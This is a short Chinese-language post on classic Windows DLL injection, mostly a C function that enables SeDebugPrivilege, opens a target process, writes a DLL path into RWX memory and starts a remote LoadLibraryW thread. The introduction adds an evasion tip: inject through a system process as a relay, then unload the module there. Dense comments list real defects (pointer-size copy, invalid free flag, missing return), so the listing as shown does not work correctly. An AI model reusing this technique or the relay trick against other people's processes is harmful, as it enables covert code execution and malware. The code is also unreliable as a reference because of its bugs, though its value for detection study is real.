1.简介

最经典的注入方式，容易实现，但只需监控 LoadLibrary 系列函数即可发现。

还可以注入中转,如先将模块注入到系统进程中,利用系统进程再次注入到目标进程,然后从系统进程卸载掉模块

 

2.代码

/*
 * threadInject - the textbook CreateRemoteThread / LoadLibraryW injection.
 *
 * Enables SeDebugPrivilege on the caller's token, opens the target process
 * with PROCESS_ALL_ACCESS, commits one page there, copies the DLL path in
 * with WriteProcessMemory, and starts a remote thread whose start address is
 * LoadLibraryW and whose argument is that page.  Every one of those steps
 * (privilege enablement, full-access process handle, cross-process RWX
 * allocation, remote memory write, remote thread starting in kernel32) is a
 * standard telemetry point for detection tooling, which is the "easy to
 * monitor" caveat the text above refers to.
 *
 * dllpath: NUL-terminated wide path of the module to load in the target.
 * pid:     target process id.
 * Returns 0 on any failure.  NOTE: the success path falls off the end of a
 * DWORD function without a return statement, so the value a caller sees on
 * success is undefined; callers cannot reliably tell success from failure.
 *
 * Other defects visible in this listing (left as-is, documented only):
 *  - No return value of the token/privilege calls is checked; if
 *    OpenProcessToken fails, hToken is uninitialized when it is closed.
 *  - sizeof(dllpath) is the size of a WCHAR* (4 or 8 bytes), not the length
 *    of the string, so only the first few bytes of the path are copied.
 *  - MEM_FREE is a memory-state value, not a VirtualFreeEx dwFreeType flag
 *    (those are MEM_DECOMMIT / MEM_RELEASE); the cleanup calls fail and their
 *    result is ignored, leaking the page in the target on error paths.
 *  - The remote thread handle is closed without waiting on it, so the caller
 *    never learns whether LoadLibraryW succeeded.
 */
DWORD threadInject(WCHAR* dllpath,DWORD pid)
{
    // Enable SeDebugPrivilege on our own token first (needed for
    // PROCESS_ALL_ACCESS on processes we do not otherwise own).
    HANDLE hToken;
    LUID newLuid;
    TOKEN_PRIVILEGES tr;
    tr.PrivilegeCount = 1;
    // tr.Privileges-> indexes the first (and only) LUID_AND_ATTRIBUTES entry.
    tr.Privileges->Attributes = SE_PRIVILEGE_ENABLED;
    OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken); // result unchecked
    LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &newLuid);               // result unchecked
    tr.Privileges->Luid = newLuid;
    AdjustTokenPrivileges(hToken, FALSE, &tr, sizeof(tr), 0, 0);       // result unchecked
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, NULL, pid);
    // Obtain the process handle; OpenProcess returns NULL on failure, the
    // INVALID_HANDLE_VALUE comparison is defensive only.
    if (hProcess==0||hProcess==INVALID_HANDLE_VALUE)
    {
        CloseHandle(hToken);
        return 0;
    }
    // Reserve+commit one page in the target for the LoadLibraryW argument.
    // Only a string is stored here, yet the page is requested RWX.
    LPVOID p = VirtualAllocEx(hProcess, 0, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (!p)
    {
        CloseHandle(hProcess);
        CloseHandle(hToken);
        return 0;
    }
    // Write the argument (the DLL path).  sizeof(dllpath) is the pointer
    // size, not the string length - see the header comment.
    if (!WriteProcessMemory(hProcess, p, (LPVOID)(dllpath), sizeof(dllpath), NULL))
    {
        // MEM_FREE is not a valid dwFreeType here; this call fails silently.
        VirtualFreeEx(hProcess, p, 0x1000, MEM_FREE);
        CloseHandle(hProcess);
        CloseHandle(hToken);
        return 0;
    }
    // Create a remote thread whose entry is LoadLibraryW with the path page
    // as its single argument.  The address is resolved in *our* kernel32;
    // this relies on kernel32 being mapped at the same base in the target
    // (same bitness, same boot session).
    HANDLE cThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)(GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "LoadLibraryW")), p, 0, 0);
    if (cThread==0||cThread==INVALID_HANDLE_VALUE)
    {
        // MEM_FREE is not a valid dwFreeType here; this call fails silently.
        VirtualFreeEx(hProcess, p, 0x1000, MEM_FREE);
        CloseHandle(hProcess);
        CloseHandle(hToken);
        return 0;
    }
    // No wait on cThread: the outcome of LoadLibraryW is never observed,
    // and the path page is never freed in the target.
    CloseHandle(cThread);
    CloseHandle(hProcess);
    CloseHandle(hToken);
    // Missing return statement on the success path (undefined return value).

}